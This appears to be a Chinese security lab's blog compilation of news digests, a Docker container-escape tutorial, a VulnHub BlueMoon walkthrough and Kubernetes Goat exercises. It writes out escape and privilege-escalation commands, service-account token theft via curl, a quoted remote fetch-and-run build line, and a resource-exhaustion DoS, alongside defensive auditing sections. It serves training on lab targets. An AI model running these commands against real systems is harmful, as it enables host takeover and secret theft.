免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美国悬赏 1000 万美元获取有关 NotPetya 网络攻击的情报 https://www.securityweek.com/us-offers-10-million-reward-russian-intelligence-officers-behind-notpetya-cyberattacks 2、Rocket Kitten APT组织利用最近修补的VMware 漏洞 https://securityaffairs.co/wordpress/130630/apt/iran-apt-exploiting-vmware-rce.html 3、Stormous 勒索软件声称已入侵了饮料公司可口可乐公司 https://securityaffairs.co/wordpress/130614/cyber-crime/stormous-ransomware-hit-coca-cola.html 4、The Intercept 披露美国监控公司Anomaly Six可实时跟踪30亿台设备 https://theintercept.com/2022/04/22/anomaly-six-phone-tracking-zignal-surveillance-cia-nsa/ 5、IBM 数据库DB2更新解决了第三方 XML 解析器中的关键漏洞 https://portswigger.net/daily-swig/ibm-database-updates-address-critical-vulnerabilities-in-third-party-xml-parser 6、在微软禁用宏之后，Emotet利用OneDrive URL和XLL文件进行感染 https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques 7、德国风力涡轮公司遭到"有针对性的专业网络攻击" https://www.securityweek.com/german-wind-turbine-firm-discloses-targeted-professional-cyberattack 8、研究人员披露了Prynt Stealer信息窃取恶意软件 https://www.bleepingcomputer.com/news/security/new-powerful-prynt-stealer-malware-sells-for-just-100-per-month/ 9、研究人员展示机器学习模型可植入无法检测到的后门 https://arxiv.org/abs/2204.06974v1 10、十年增长三倍！安全漏洞数量创纪录增长 https://www.secrss.com/articles/41635

Docker逃逸 　什么是Docker 　Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中，然后发布到任何流行的 Linux或Windows操作系统的机器上，也可以实现虚拟化。容器是完全使用沙箱机制，相互之间不会有任何接口。正因为docker属于沙箱机制，所以当获得docker容器的权限时与获得宿主机权限是两个概念。 　Docker逃逸 配置不当引起的docker逃逸 docket remote api未授权访问导致逃逸 特权模式逃逸 挂载敏感目录 内核漏洞提权实现逃逸（针对Linux内核利于dirtycow、dirtypipe等） Docker本身漏洞（CVE） CVE-2019-5736 CVE-2019-14271 　这里主要测试挂载卷造成的逃逸 　挂载敏感目录逃逸之特权模式挂载逃逸 　实验环境：ubuntu16.04 ，docker 版本 20.10 service docker status 　docker的状态是开启的，未安装docker需要安装 　特权模式下启动一个容器 docker run -it --privileged ff6f /bin/bash 　查看docker容器磁盘文件 fdisk -l 　正常环境安装的时候也都会创建磁盘文件，所以这些目录下会有很多文件 ls /dev 　创建一个目录名为"test"，名字任意创建 mkdir test 　此时test目录下无任何文件,将/dev/sda1挂载在test目录下 mount /dev/sda1 /test 　查询test目录 　此时例如home等目录下是没有任何文件的 　将amazing写入/test/home/1.txt echo "amazing" >/test/home/1.txt 　此时宿主机home，目录下是存在1.txt文件的 　挂载敏感目录逃逸之docker.sock 挂载 　Docker架构相当于C/S架构，docker.sock就是docker中套docker，docker的client和server的通信模式参考 https://www.jb51.net/article/99019.htm　因为确实找不到什么比较官方或者正式的介绍，华为云的介绍只是介绍了网络通信模式 　socket的连接方式有三种 unix:///var/run/docker.sock tcp://host:port fd://socketfd 　利用docker.sock逃逸的前提条件 攻击者获得了 docker 容器的访问权限 容器已安装/var/run/docker.sock 　使用挂载实现docker.sock,拉取一个镜像ubuntu16.04 docker pull ubuntu:16.04 　查看镜像 docker images 　运行一个挂载/var/run/的容器 docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:16.04 /bin/bash 　进入docker容器内 apt-get install docker.io 　这个时候安装可能报错 　更新源 apt update 　更新源之后重新安装docker，因为拉取的ubuntu内未安装docker或者可能是docker版本过老 apt-get install docker.io 　查看宿主机信息 docker -H unix://var/run/docker.sock info 　利用docker.sock再创建一个docker容器，挂载/var/run docker -H unix://var/run/docker.sock run -v /:/test -it ubuntu:16.04 /bin/bash 　此时查看test目录下可看到宿主机文件文件 　实现逃逸。这里本来打算使用alpine镜像，这里说说什么是alpine镜像 alpine(https://www.alpinelinux.org/)是一个官方推荐的基础镜像，大小5MB，相对于ubuntu的大小来说下载方便，但是拉取ubuntu镜像也比较方便。 　但是alpine在更新apk的时候，比较慢 　所以还是建议使用ubuntu，这里可以利用docker逃逸去复制宿主机的source.list更换源，可能会快一点。 　原理 　过程可分为两部分 文件写入 将数据写入文件，它可用于执行特权写入或在受限文件系统之外写入文件，通过将文件复制到临时容器并返回到主机上的目标位置来写入文件。 CONTAINER_ID="$(docker run -d alpine)" # or existing TF=$(mktemp) echo "DATA" > $TF docker cp $TF $CONTAINER_ID:$TF docker cp $CONTAINER_ID:$TF file_to_write 文件读取 它从文件中读取数据，它可用于进行特权读取或在受限文件系统之外公开文件，通过将文件复制到临时容器并返回到主机上的新位置来读取文件。 CONTAINER_ID="$(docker run -d alpine)"  # or existing TF=$(mktemp) docker cp file_to_read $CONTAINER_ID:$TF docker cp $CONTAINER_ID:$TF $TF cat $TF 　二进制文件设置了 SUID 位，会被滥用来访问文件系统、升级或维护特权访问作为 SUID 后门，上面那个复现过程实现了创建二进制文件的本地 SUID 副本并运行它以维护提升的权限，要与现有的 SUID 二进制文件交互，请跳过第一个命令并使用其原始路径运行程序，其最终结果是在容器B中实现了对宿主机权限的控制。 　BlueMoon简介 Name: BlueMoon: 2021 Date release: 7 Apr 2021 Author: Kirthik Series: BlueMoon 　环境搭建 　攻击机kali IP 192.168.158.39 　目标靶机Debian,ip地址未知，dhcp自动获取 　下载地址 https://download.vulnhub.com/bluemoon/bluemoon.ova　导入虚拟机，官网描述是使用vb，但是vmware可以导入，然而出现问题获取不到网卡 　信息搜集 netdiscover -n 192.168.248.39/24 　我使用搞得热点比较容易确定目标靶机，扫描端口 nmap -A -p- 192.168.158.250 　开放三个端口21，22以及80 　扫描目录，指纹识别，既然是靶场要考虑到21端口是不是匿名用户或者22和21端口是否能爆破，直接对21和22端口爆破并未有结果，也可能是字典的问题，但是换了几个字典确实没用，扫描目录使用dirsearch扫描目录，内置字典并不能扫描出结果，换字典 python3 dirsearch.py -u "http://192.168.158.250" -e * 　访问是个二维码,扫描的内容 #!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF 　获取flag 　ftp的账号密码 userftp/ftpp@ssword 　工具连接或者命令行都可 　在information.txt中告诉了，p_list.txt为密码字典，用户名为robin, 　上级目录中有jerry中有个用户名的txt，但是无法查看文件，使用robin用户爆破 　账号密码 robin/k4rv3ndh4nh4ck3r 　ssh登录 ssh robin@192.168.158.250 ls cat user1.txt 　使用命令 sudo -l 　告诉了jerry权限可以执行/home/robin/project/feedback.sh 　横向提权 sudo -u jerry /home/robin/project/feedback.sh jerry /bin/sh 　当前用户为jerry,这个时候我们就可以读取前面不能读取的user2.txt，因为这个时候在home/robin,所以切换用户目录读取或者直接读取文件 　垂直提权 　给出提示使用find继续提权到root，所以这里应该的考点就是suid提权了，因为不是交互式的shell使用起来不方便，所以使用python获取交互式shell python -c 'import pty;pty.spawn("/bin/bash")' 　查询是否有suid权限的文件 find / -perm -u=s -type f 2>/dev/null find /usr/bin/passwd -exec "/bin/sh" \; 　无果，，，，纳闷儿了 docker images docker ps 　镜像没起起来，搜索一下才知道这里需要使用镜像挂载来进行提权 docker run -v /:/mnt --rm -it alpine chroot /mnt sh 　此时已经为root权限，读取根目录下的root.txt 　结语 　这个靶机有点儿不怎么有好的地方在于对于字典的要求比较高，难点在于使用镜像挂载提权，这里可参考文章应该是讲镜像挂载原理比较清晰的文章吧。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、BlackCat 勒索软件团伙在全球范围内入侵了 60 多个组织 https://securityaffairs.co/wordpress/130582/reports/fbi-blackcat-ransomware.html 2、研究人员披露了谷歌 VirusTotal 平台中的高危RCE 漏洞 https://thehackernews.com/2022/04/researchers-report-critical-rce.html 3、Everscale 钱包中的严重漏洞可能让攻击者窃取加密货币 https://thehackernews.com/2022/04/critical-bug-in-everscale-wallet.html 4、遭网络攻击后法国 GHT 医院集团被迫断开互联网连接 https://www.bleepingcomputer.com/news/security/french-hospital-group-disconnects-internet-after-hackers-steal-data/ 5、QNAP固件更新修复其 NAS 中的 Apache HTTP 漏洞 https://securityaffairs.co/wordpress/130481/hacking/qnap-nas-firmware-fix-apache-http-flaws.html 6、研究人员分析了Quantum勒索软件攻击的技术细节 https://www.bleepingcomputer.com/news/security/quantum-ransomware-seen-deployed-in-rapid-network-attacks/ 7、伊朗称挫败了针对其公共服务的大规模网络攻击 https://www.securityweek.com/state-tv-says-iran-foiled-cyberattacks-public-services 8、黑客将“More_Eggs”恶意软件植入招聘简历中 https://thehackernews.com/2022/04/hackers-sneak-moreeggs-malware-into.html 9、APT37使用新的恶意软件GOLDBACKDOOR针对记者 https://www.bleepingcomputer.com/news/security/north-korean-hackers-targeting-journalists-with-novel-malware/ 10、调查发现41% 的企业在过去一年中发生过 API 安全事件 https://www.helpnetsecurity.com/2022/04/25/apis-security-challenges/

实验环境：https://katacoda.com/madhuakula/scenarios/kubernetes-goat 　0x9 Helm v2 tiller 风险（已弃用） 此方案已被弃用，供学习参考，环境默认是 Helm v3版本，可以安装Helm v2版本来实验 Helm是Kubernetes的包管理器。这就像ubuntu的apt-get。在此场景中，利用较旧版本的HELM(版本2)，tiller 服务 RBAC 默认设置获取集群的访问权限。 helm init --service-account=tiller --tiller-image=gcr.io/kubernetes-helm/tiller:v2.14.1   --history-max 300 　运行以下命令开启场景： kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash 　默认情况配置下，Helm v2 Ttiller部署具有完全群集管理员权限的RBAC。 　默认安装在 kube-system 命名空间中，服务名称为tiller-deploy，端口 44134 暴露在 0.0.0.0。所以我们可以通过运行 telnet 命令来验证。 telnet tiller-deploy.kube-system 44134 　现在，我们可以连接到tiller服务端口了。我们可以使用 helm 来执行操作并与 tiller 服务通信。 　让我们试试是否可以从Kube-System命名空间获取集群中的Kubernetes secrets 　发现没有权限访问。 　然后可以创建自己的 helm chart来授予默认服务帐户完全集群管理员访问权限，因为默认情况下，当前 pod 部署在具有默认service account的默认命名空间中。 helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart 　现在 pwnchart 已部署，它已授予所有默认服务帐户集群管理员访问权限。因此，让我们再次尝试获取 kube-system namespace secrets 　此场景会改变Tiller部署的执行方式，有时管理员会使用特定权限将Tiller部署到特定的名称空间。同样在Helm v3中，也没有tiller服务来缓解此类漏洞。 　参考资料： 　https://engineering.bitnami.com/articles/helm-security.html 　0x10 分析被部署挖矿软件的容器镜像 　针对基础设施的挖矿攻击越来越流行。尤其是像 Kubernetes 这样的环境很容易成为目标，因为你甚至看不到容器镜像到底是基于什么构建的，以及它在主动监控方面做了什么。在此场景中，我们将分析和识别被植入挖矿软件的容器镜像。 　首先，确定 Kubernetes 集群中的所有资源/镜像和包括作业。 controlplane $ kubectl get jobs NAME               COMPLETIONS   DURATION   AGE batch-check-job    1/1           6m32s     32m hidden-in-layers   0/1 　标识Kubernetes群集内的所有资源。尽可能详细了解集群内所有节点中可用的每个容器镜像的详细信息。 　一旦我们确定了在Kubernetes集群中运行的作业，就可以通过运行以下命令来获取Pod信息。 kubectl describe job batch-check-job 　获取pods信息： kubectl get pods --namespace default -l "job-name=batch-check-job" 　获取pod信息manifest并分析： kubectl get pod batch-check-job-xxxx -o yaml 　可以看到Docker镜像名称是madhuakula/k8s-goat-batch-check 　然后通过docker history查看镜像的构建历史记录： docker history --no-trunc madhuakula/k8s-goat-batch-check 　我们发现它在其中一层的构建中植入了恶意挖矿脚本 curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup 　0x11 绕过Kubernetes命名空间 　场景描述 　默认情况下，Kubernetes 使用平行网络架构，这意味着集群中的任何 pod/service都可以与其他 pod/service 通信。默认情况下，集群内的命名空间没有任何网络安全限制。命名空间中的任何容器都可以与其他命名空间通信。我们听说 Kubernetes-Goat喜欢缓存。让我们看看我们是否可以访问其他命名空间。 　首先运行以下命令，创建一个名为hacker-container的容器： kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh 　收集集群IP信息： ip route ip a show printenv 　基于对系统的分析/理解，尝试使用zmap扫描集群内的redis服务信息： zmap -p 6379 10.0.0.0/8 -o results.csv 　查看结果： 还有另一种方法可以访问 Kubernetes 中的服务/pod。例如使用 https://kubernetes.io/docs/concepts/services-networking/service/#dns cache-store-service.secure-middleware (servicename.namespace)。https://kubernetes.io/docs/concepts/services-networking/service/#dns 　使用redis-cli进行连接 集群内还有许多其他的服务和资源，比如ElasticSearch，Mongo等等。所以，如果你的侦察技术很好，那么你可以在这里找到很多有价值的东西。 　0x12 获取环境信息 　场景描述 　Kubernetes 中的每个环境都会有很多信息要共享。包括Secrets、API Keys、配置、服务等等关键内容。所以让我们继续收集关键信息！ 　访问http://127.0.0.1:1233 　收集系统关键信息 id cat /proc/self/cgroup cat /etc/hosts mount ls -la /home/ 　获取环境变量，包括 Kubernetes Secret 的 K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c3 和服务名称、端口等。 　0x13 针对环境的DoS风险 　场景描述 　如果Kubernetes 资源清单中没有规范，也没有为容器应用限制范围。作为攻击者，我们可以消耗 pod/deployment 运行的所有资源，并饿死其他资源，从而对环境造成 DoS攻击。 　本场景在http://127.0.0.1:1236中完成 　此部署 pod 未在 Kubernetes 清单中设置任何资源限制。所以我们可以轻松执行一些列消耗资源的操作。 　在这个 pod 中，安装了一个名为 stress-ng 的程序（压力测试工具） 　执行之前查看资源情况： kubectl --namespace big-monolith top pod hunger-check-deployment-5d94d56fdb-hc2bv 　执行 stress-ng 的程序 stress-ng --vm 2 --vm-bytes 2G --timeout 30s 　再次查看资源情况： 此攻击在某些情况下可能不起作用，如自动扩展、资源限制等情况 　0x14 hacker-container 简介 　场景描述 　这个场景只是对Kubernetes集群环境中的常见安全实用程序的探索。在之前你可能已经多次使用过hacker-container了。 　运行： kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh Hacker Container是一个实用工具，其中包含黑客入侵Kubernetes集群时可能会用的工具/命令列表。因此，你可以使用它对 Kubernetes 环境进行自由探索。在这里，我们介绍一些强大的实用程序。 　容器自检实用程序，用于获取系统功能的概述： amicontained 　针对内部服务执行 Nikto 扫描 nikto.pl -host http://metadata-db 　还有许多其他程序。为了最大限度地利用hacker-container，我们可以使用主机特权、卷、进程等等。 　0x15 Hidden in layers 　场景描述 　敏感信息泄露是普遍存在的最常见漏洞之一。在容器化世界中，密码、私钥、令牌等很容易被错误处理。此场景下，我们将分析和识别导致敏感信息泄露等此类处理不当的不良做法之一。 　执行以下命令，开始本次场景： kubectl get jobs 　尝试浏览运行容器中的所有文件、环境变量等。接下来，尝试用不同的工具分析上面使用的镜像，以找到暴露的敏感信息。 　获取详细信息： 　使用docker cli分析镜像信息 docker inspect madhuakula/k8s-goat-hidden-in-layers 　可以看到镜像设置了容器启动时要执行的一些命令。但获取的信息还太少，继续探索。 　如果我们了解这个镜像是如何从头开始构建的，也许对我们会更有帮助。如果你有 dockerfile，可以直接分析镜像的 dockerfile。如果没有，可以通过其他几种方法分析。 方法一，查看构建历史 docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers 可以看到在构建镜像的时候，添加了一个secret.txt的文件，可能是密钥之类的敏感文件。 方法二，通过镜像反向生成dockerfile 可以通过alpine/dfimage 工具生成指定镜像的dockerfile alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers 方法三，使用Dive工具 Dive 是一个非常棒的工具，可以帮助分析镜像的每一层。https://github.com/wagoodman/dive 安装方式可以参考官方说明，使用方法如下 dive madhuakula/k8s-goat-hidden-in-layers 　从以上分析中，我们可以看到/root/contributions.txt, /root/secret.txt这两个比较重要和可疑的文件。 　接下来看看是否可以在运行的容器中找到这些文件。 　可以看到只有contribution.txt，而secret.txt，在构建的时候被删除了。我们现在想办法恢复它。 　首先使用docker save把镜像导出为文件。 docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers.tar 　解压出来： tar -xvf hidden-in-layers.tar 　我们可以看到每个层都被导出为一个单独的tar文件。这个镜像有3层，所以有3个tar文件。这里因为只有3层，所以很容易提取所有的层并检查内容，但如果镜像有上百层，这个方法就不太好用了。 　根据之前dive的检查结果 　在id为da73da4359e9edb793ee5472ae3538be8aec57c27efff7dae8873566c865533f的这一层，添加了secret.txt文件，所以我们解压这一层的tar进行文件分析 　找到了关键信息。 　参考： 　深入了解docker层：https://jessicagreben.medium.com/digging-into-docker-layers-c22f948ed612 　0x16 RBAC最低权限配置错误 　场景描述 　在现实世界中，们经常看到开发人员和 devops 团队往往会提供超出需求的额外权限。这种情况发生时，攻击者获得了比他们预期的更多的控制权和特权。在此场景中，你可以利用绑定到 pod 的 serviceaccount 提供的 webhookapikey 访问权限。但这也会让攻击者可以控制和获取敏感资源。获得对 vaultapikey 的访问权限。 　首先访问http://127.0.0.1:1236 　此部署具有映射了过度许可策略/访问权限的自定义服务帐户。作为攻击者，我们可以利用这一点来访问其他资源和服务。 　由于Kubernetes默认情况下将所有secrets、tokens和service accounts信息都存储在一个固定的目录。 　直接访问这个目录，查找敏感的信息： cd /var/run/secrets/kubernetes.io/serviceaccount/ ls -la 　现在我们可以使用这些信息与 Kubernetes API 服务进行交互，该服务具有对令牌的可用权限和特权。 　指向内部 API 服务器主机名： export APISERVER=https://${KUBERNETES_SERVICE_HOST} 　设置 ServiceAccount 令牌的路径 export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount 　读取 pods namespace 并将其设置为变量。namespace应该是 big-monolith，如果它是default，你需要将 Kubernetes-goat 更新到最新版本（https://github.com/madhuakula/kubernetes-goat/commit/d068966ae481df55caed818c7cfc14867c1e42a1） export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) 　指定读取ServiceAccount持有者令牌 export TOKEN=$(cat ${SERVICEACCOUNT}/token) 　指定在cURL请求查询时要使用的证书路径 export CACERT=${SERVICEACCOUNT}/ca.crt 　然后就可以使用令牌和构造的查询来访问 Kubernetes API了 curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api 　查询default命名空间中的secrets curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets 　查询特定命名空间的secrets curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets 　查询特定命名空间中的pod curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods 因为 Kubernetes 本身是利用 API 服务来创建、删除 pod 等操作的，所以你可以尝试并利用所有可能的 Kubernetes 操作。 　获取 k8svaultapikey curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey 　解密看看: echo "azhzLWdvYXQtODUwNTc4NDZhODA0NmEyNWIzNWYzOGYzYTI2NDlkY2U=" | base64 -d 　0x17 利用KubeAudit 审计 Kubernetes 集群 　场景描述 　本场景主要针对Kubernetes集群的各种不同安全问题进行审计。 　要开始这个场景，你可以运行以下命令启动一个具有集群管理员权限的hacker-container(tiller Service Account拥有集群管理员权限) 　这一步可能需要先在kubernetes集群上为Tiller创建具有集群管理员权限的Service Account。 　相关教程：https://cloud.tencent.com/developer/article/1559675 kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash kubeaudit 是一个命令行工具和一个 Go 包，用于审计 Kubernetes 集群各种不同的安全问题，例如： run as non-root //非root运行 use a read-only root filesystem //使用只读文件系统 drop scary capabilities, don't add new ones //丢弃高危 capabilities，不添加新的 don't run privileged //不要以特权身份运行 and more! //等更多 　有关该项目的更多详细信息，请参考 https://github.com/Shopify/kubeaudit 　运行 kubeaudit。 Kubeaudit会检测它是否在集群中的容器内运行。如果是这样，它将尝试审计该集群中的所有 Kubernetes 资源。 kubeaudit all 　0x18 使用 Sysdig Falco 进行运行时安全监控和检测 　场景描述 　这个场景是为容器和Kubernetes资源部署运行时安全监控和检测。 　要开始使用此方案，你需要使用helm v3进行部署 helm repo add falcosecurity https://falcosecurity.github.io/charts helm repo update helm install falco --set falco.jsonOutput=true falcosecurity/falco 云原生运行时安全项目Falco 是事实上的 Kubernetes 威胁检测引擎。 Falco 由 Sysdig 于 2016 年创建，是第一个作为孵化级项目加入 CNCF 的运行时安全项目。 Falco 可在运行时检测意外的应用程序行为并发出威胁警报。 Falco 通过以下方式使用系统调用来保护和监控系统： Parsing the Linux system calls from the kernel at runtime //在运行时从内核解析 Linux 系统调用 Asserting the stream against a powerful rules engine //强大的规则引擎断言流 Alerting when a rule is violated //在违反规则时发出警报 Falco附带了一组默认规则，用于检查内核的异常行为，例如： Privilege escalation using privileged containers //使用特权容器提权 Namespace changes using tools like setns //使用 setns 等工具更改命名空间 Read/Writes to well-known directories such as /etc, /usr/bin, /usr/sbin, etc //对场景目录的读/写操作，如/etc、/usr/bin、/usr/sbin等 Creating symlinks //创建符号链接 Ownership and Mode changes //所有权和模式更改 Unexpected network connections or socket mutations //意外的网络连接或套接字突变 Spawned processes using execve //使用execve派生的进程 Executing shell binaries such as sh, bash, csh, zsh, etc //执行 shell 二进制文件，例如 sh、bash、csh、zsh 等 Executing SSH binaries such as ssh, scp, sftp, etc //执行 SSH 二进制文件，例如 ssh、scp、sftp 等 Mutating Linux coreutils executables //异常的Linux核心实用程序可执行文件 Mutating login binaries //异常的登录二进制文件 Mutating shadowutil or passwd executables such as shadowconfig, pwck, chpasswd, getpasswd, change, useradd, etc, and others. // 异常的shadowutil 或 passwd 可执行文件，例如 shadowconfig、pwck、chpasswd、getpasswd、change、useradd 等。 　获取 falco 部署的更多详细信息 　手动从Falco系统获取日志 kubectl logs -f -l app=falco 　现在，让我们启动一个hacker container并读取敏感文件，看看Falco是否能检测到 　0x19 使用Popeye发现Kubernetes集群潜在问题 　场景描述 　此场景主要是通过实时扫描Kubernetes集群来审核Kubernetes集群，并上报部署的资源和配置的潜在问题。 　要开始这个场景，运行以下命令启用具有集群管理员权限的hacker container kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash Popeye 是一种实用程序，可扫描实时 Kubernetes 集群并报告已部署资源和配置的潜在问题。它根据部署的内容为集群消毒。通过扫描集群，它可以检测错误配置并帮助你确保最佳实践到位，从而防止未来出现问题。Popeye 是一个只读工具，它不会以任何方式改变任何 Kubernetes 资源。 　以下是一些检查和扫描列表： Node //节点 Namespace Pod Service ServiceAccount Secrets ConfigMap Deployment StatefulSet DaemonSet PersistentVolume PersistentVolumeClaim HorizontalPodAutoscaler PodDisruptionBudget ClusterRole ClusterRoleBinding Role RoleBinding Ingress NetworkPolicy PodSecurityPolicy 　有关该项目的更多详细信息，请参考 https://github.com/derailed/popeye 　使用cluster token权限在集群中运行运行popeye 　可以看到，集群健康评分为83 B 　0x20 使用 NSP 保护网络边界 　场景描述 　这个场景是为Kubernetes资源部署一个简单的网络安全策略来创建安全边界。 　要开始此场景，请确保必须使用支持NetworkPolicy的网络解决方案。 　场景提供来自：https://github.com/ahmetb/kubernetes-network-policy-recipes 　如果你希望在IP 地址或端口层面（OSI第 3 层或第 4 层）控制网络流量， 则你可以考虑为集群中特定应用使用 Kubernetes 网络策略（NetworkPolicy）。 NetworkPolicy 是一种以应用为中心的结构，允许你设置如何允许 Pod 与网络上的各类网络“实体” （我们这里使用实体以避免过度使用诸如“端点”和“服务”这类常用术语， 这些术语在 Kubernetes 中有特定含义）通信。 　Pod 可以通信的 Pod 是通过如下三个标识符的组合来辩识的： 　1、其他被允许的 Pods（例外：Pod 无法阻塞对自身的访问） 　2、被允许的名字空间 　3、IP 组块（例外：与 Pod 运行所在的节点的通信总是被允许的， 无论 Pod 或节点的 IP 地址） 　在定义基于 Pod 或namespace的 NetworkPolicy 时，你可以使用 selector 来设定哪些流量可以进入或离开与该selector匹配的 Pod。 　同时，当基于 IP的 NetworkPolicy 被创建时，我们基于 IP 组块（CIDR 范围） 来定义策略。 　创建一个拒绝所有去往应用流量的策略 此 NetworkPolicy 会将所有去往被Pod Selectors 选择的应用程序pod流量丢弃。 　使用案例： 这其实很常见：如果要使用白名单网络策略，首先需要使用此策略将流量列入黑名单 你想运行一个 Pod 并希望阻止任何其他 Pod 与其通信 你暂时希望将发往某个服务的流量与其他Pod隔离 　示例 　运行一个labels为app=web的Nginx pod，并暴露80端口 kubectl run --image=nginx web --labels app=web --expose --port 80 　运行一个临时 Pod 并向 Web Service 发送请求 kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh 　可以看到能够正常访问，现在我们对集群应用下列网络策略 kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: web-deny-all spec: podSelector:   matchLabels:     app: web ingress: [] 　再次尝试请求Web Service 　流量被丢弃了 Kuberneters Goat 提供的在线环境中，使用的是flannel网络解决方案，是不支持NetworkPolicy的。可以使用Calico网络解决方案。 　说明： 在上面的清单中，我们以带有 app=web 标签的 Pod 为目标来配置网络策略。此清单文件缺少 spec.ingress 字段。因此它不允许任何流量进入 Pod。 如果你创建另一个 NetworkPolicy 让某些 Pod 直接或间接访问此应用程序，则此 NetworkPolicy 将失效。 如果至少有一个 NetworkPolicy 的规则允许流量，则意味着流量将被路由到 Pod，而不管阻止流量的策略如何。 　删除策略 kubectl -- delete -f web-deny-all.yaml 　更多参考资料和资源可以在 https://github.com/ahmetb/kubernetes-network-policy-recipes 找到 　Cilium 编辑器 - 网络策略编辑器 Cilium编辑器一个教你如何创建网络策略的工具/框架。它解释了基本的网络策略概念，并指导你完成实现所需的最低权限安全和零信任概念所需的步骤。 　在线访问 Cilium Editorhttps://editor.cilium.io/ 　参考资料： 　https://kubernetes.io/docs/concepts/services-networking/network-policies/https://github.com/ahmetb/kubernetes-network-policy-recipeshttps://editor.cilium.io/ 　0x21 Kubernetes Goat的安全扫描报告 　使用其他开源安全工具扫描Kubernetes Goat基础设施生成的安全扫描报告 Checkov：https://github.com/bridgecrewio/checkov git clone git@github.com:madhuakula/kubernetes-goat.git checkov -d kubernetes-goat/ 扫描报告了232个问题： KICS：https://kics.io/ KICS 扫描报告了 265 个问题和Kubernetes Goat中的 Docker 配置问题。 详细报告：https://madhuakula.com/kubernetes-goat/reports/kics-output.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、网络攻击导致哥斯达黎加政府系统混乱 https://www.securityweek.com/cyberattack-causes-chaos-costa-rica-government-systems 2、对俄发起网络战以来，匿名者共泄露了 5.8 TB 的俄方数据 https://securityaffairs.co/wordpress/130554/hacktivism/anonymous-leaked-5-8-tb-russian-data.html 3、谷歌：2021年是0-day攻击创记录之年 https://www.infosecurity-magazine.com/news/google-record-year-for-zero-days/ 4、未打补丁的Exchange服务器遭Hive勒索攻击 逾期就公开数据 https://www.cnbeta.com/articles/tech/1261193.htm 5、FBI 警告针对美国农业的勒索软件攻击激增 https://www.infosecurity-magazine.com/news/fbi-warns-us-farmers-of-ransomware/ 6、美国国土安全部宣布Hack DHS的第一阶段发现了122个漏洞 https://therecord.media/first-phase-of-hack-dhs-finds-over-120-vulnerabilities/ 7、安全研究人员发现了最新的REvil泄密网站 https://www.theregister.com/2022/04/22/revil_ransomware_returns/ 8、美国能源部提供1200万美元资助6个大学团队开发网络攻击防御工具 https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-jira-authentication-bypass-vulnerability/ 9、Emotet恶意软件改造使用新的攻击载荷 https://cyware.com/news/emotet-revamp-new-payloads-and-64-bit-modules-8905bdd7 10、SuperCare Health 面临数据泄露起诉 https://www.infosecurity-magazine.com/news/supercare-health-faces-lawsuits/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、T-Mobile 证实 Lapsus$ 获得了对其内部工具和源码的访问权限 https://thehackernews.com/2022/04/t-mobile-admits-lapsus-hackers-gained.html 2、Atlassian 发布漏洞补丁修复了高危Jira身份验证绕过漏洞 https://thehackernews.com/2022/04/atlassian-drops-patches-for-critical.html 3、研究人员发布了高危Java数字签名绕过漏洞PoC https://thehackernews.com/2022/04/researcher-releases-poc-for-recent-java.html 4、Conti 勒索软件声称对哥斯达黎加的勒索攻击负责 https://securityaffairs.co/wordpress/130505/cyber-crime/costa-rica-conti-ransomware.html 5、Lemon_Duck 挖矿僵尸网络以 Docker 服务器为目标 https://securityaffairs.co/wordpress/130470/cyber-crime/lemon_duck-cryptomining-botnet-targets-docker.html 6、多个严重漏洞影响 SmartPTT、SmartICS 工业产品 